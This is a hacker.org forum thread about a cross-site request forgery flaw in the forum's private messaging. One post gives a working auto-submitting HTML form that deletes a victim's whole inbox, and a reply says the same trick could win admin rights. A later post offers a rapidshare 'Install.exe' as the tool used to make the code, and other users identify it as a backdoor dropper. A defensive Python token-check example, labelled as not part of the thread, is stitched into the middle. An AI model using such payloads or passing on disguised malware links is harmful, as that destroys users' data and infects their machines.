Danger - don't read this

Discussion about hacker.org's server
efe
Posts: 45
Joined: Sun Oct 26, 2008 10:28 am
Location: germany

Danger - don't read this

Post by efe »


I've warned you!

Don't click here: http://bit.ly/dontclickme

michuber
Posts: 57
Joined: Sun Oct 26, 2008 3:30 pm

Re: Danger - don't read this

Post by michuber »

It deletes all messages in your inbox...

Code:

<html>
  <head>
  </head>
  <!-- submits the hidden form below as soon as the page loads -->
  <body onLoad="javascript:document.xsrf.submit()">

<form action="http://www.hacker.org/forum/privmsg.php?folder=inbox" method="post" name="xsrf">
<input type="hidden" name="mode" value="" />
<input type="hidden" name="deleteall" value="true" />
<input type="hidden" name="confirm" value="Yes" />
</form>

</body>
</html>
m!nus
Posts: 202
Joined: Sat Jul 28, 2007 6:49 pm
Location: Germany

Post by m!nus »

nice POC. if you make a link like this for an admin you can get yourself admined :P
efe
Posts: 45
Joined: Sun Oct 26, 2008 10:28 am
Location: germany

Post by efe »

adum has just fixed that issue, so you may now safely click the link - and nothing will happen to your PMs!
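
Added example, not part of the thread and not hacker.org's or phpBB's code: the thread does not say how the issue was fixed, so this shows one common server-side defence, a per-session anti-CSRF token checked before the delete runs. The handler, the `csrf_token` field name and the session ids are assumptions; the other form fields are the ones from the PoC above.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret for the demo; a real deployment loads it from config.
SERVER_KEY = secrets.token_bytes(32)


def issue_token(session_id: str, action: str) -> str:
    """Token bound to one session and one action, embedded in the genuine form."""
    msg = f"{session_id}|{action}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def handle_privmsg_post(session_id: str, form: dict) -> str:
    """Hypothetical handler for the inbox POST; returns what the server did."""
    if form.get("deleteall") != "true" or form.get("confirm") != "Yes":
        return "no-op"
    expected = issue_token(session_id, "privmsg:deleteall")
    supplied = str(form.get("csrf_token", ""))
    # Constant-time compare; a missing or wrong token is rejected before any delete.
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "rejected"
    return "deleted"


# The browser attaches the session cookie to a cross-site POST automatically, so
# the server sees the same valid session on every request; only the token differs.
VICTIM_SESSION = "sess-constructed-victim"
OTHER_SESSION = "sess-constructed-other"

# Fields exactly as the cross-site form in the thread submits them (no token).
forged = {"mode": "", "deleteall": "true", "confirm": "Yes"}

# The site's own confirmation page carries the token in a hidden field.
genuine = dict(forged, csrf_token=issue_token(VICTIM_SESSION, "privmsg:deleteall"))

# A token issued for a different session does not validate for this one.
mismatched = dict(forged, csrf_token=issue_token(OTHER_SESSION, "privmsg:deleteall"))

if __name__ == "__main__":
    for name, form in [("forged", forged), ("genuine", genuine), ("mismatched", mismatched)]:
        print(name, "->", handle_privmsg_post(VICTIM_SESSION, form))
```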
Zaffron
Posts: 491
Joined: Thu Dec 18, 2008 12:18 am
Location: Invading a small country

Post by Zaffron »

What was the point of posting this anyways??
Chocoholic
Posts: 44
Joined: Mon Feb 16, 2009 4:11 pm
Location: UK

Post by Chocoholic »

Right, seems quite an unsafe way of exposing a vulnerability. Anyways, is this a general phpBB issue? I never liked that piece of s..oftware anyways.
tomtomtomtom
Posts: 119
Joined: Mon Mar 09, 2009 5:24 pm

LoL

Post by tomtomtomtom »

This is the program he used to generate the code>>>

http://rapidshare.com/files/211946099/Install.exe.html
PaRaDoX
Posts: 708
Joined: Fri Aug 22, 2008 5:52 am
Location: In your fridge, waiting to pop out and scare you.

Re: LoL

Post by PaRaDoX »

tomtomtomtom wrote:
This is the program he used to generate the code>>>

http://rapidshare.com/files/211946099/Install.exe.html

don't go cracker on us tomtomtomtom.

Install.exe.html?
INSTALL.EXE? no program name? nothing? that on top of the fact that there's about a 1 in (insert number of rapidshare files here) chance that you'd EVER find that. Tell me the program name, smart guy. :3

~You are a glitch in my reasoning.
plope0726
Posts: 826
Joined: Mon Dec 15, 2008 10:13 pm

Post by plope0726 »

BackDoor.VB.DMS.dropper
who
Posts: 1
Joined: Fri Jul 25, 2008 4:15 am

Post by who »

sweet!
flamingdragon
Posts: 1
Joined: Sat May 12, 2007 2:20 am

Post by flamingdragon »

Gnarly
PaRaDoX
Posts: 708
Joined: Fri Aug 22, 2008 5:52 am
Location: In your fridge, waiting to pop out and scare you.

Post by PaRaDoX »

plope0726 wrote:
BackDoor.VB.DMS.dropper

and who called it? :3


and who are these 2 new guys saying it's sweet? probably mule accounts of his...

sorry, mule is a term used in MMOs. Too used to it :3

~You are a glitch in my reasoning.
plope0726
Posts: 826
Joined: Mon Dec 15, 2008 10:13 pm

Post by plope0726 »

PaRaDoX wrote:
plope0726 wrote:BackDoor.VB.DMS.dropper
and who called it? :3


and who are these 2 new guys saying it's sweet? probably mule accounts of his...

sorry, mule is a term used in MMOs. Too used to it :3

You did :) Those 2 idiots will probably try to use it and add a nice backdoor to their own computer... :lol:
PaRaDoX
Posts: 708
Joined: Fri Aug 22, 2008 5:52 am
Location: In your fridge, waiting to pop out and scare you.

Post by PaRaDoX »

plope0726 wrote:
PaRaDoX wrote:
plope0726 wrote:BackDoor.VB.DMS.dropper
and who called it? :3


and who are these 2 new guys saying it's sweet? probably mule accounts of his...

sorry, mule is a term used in MMOs. Too used to it :3

You did :) Those 2 idiots will probably try to use it and add a nice backdoor to their own computer... :lol:

.....unless they are mules.

~You are a glitch in my reasoning.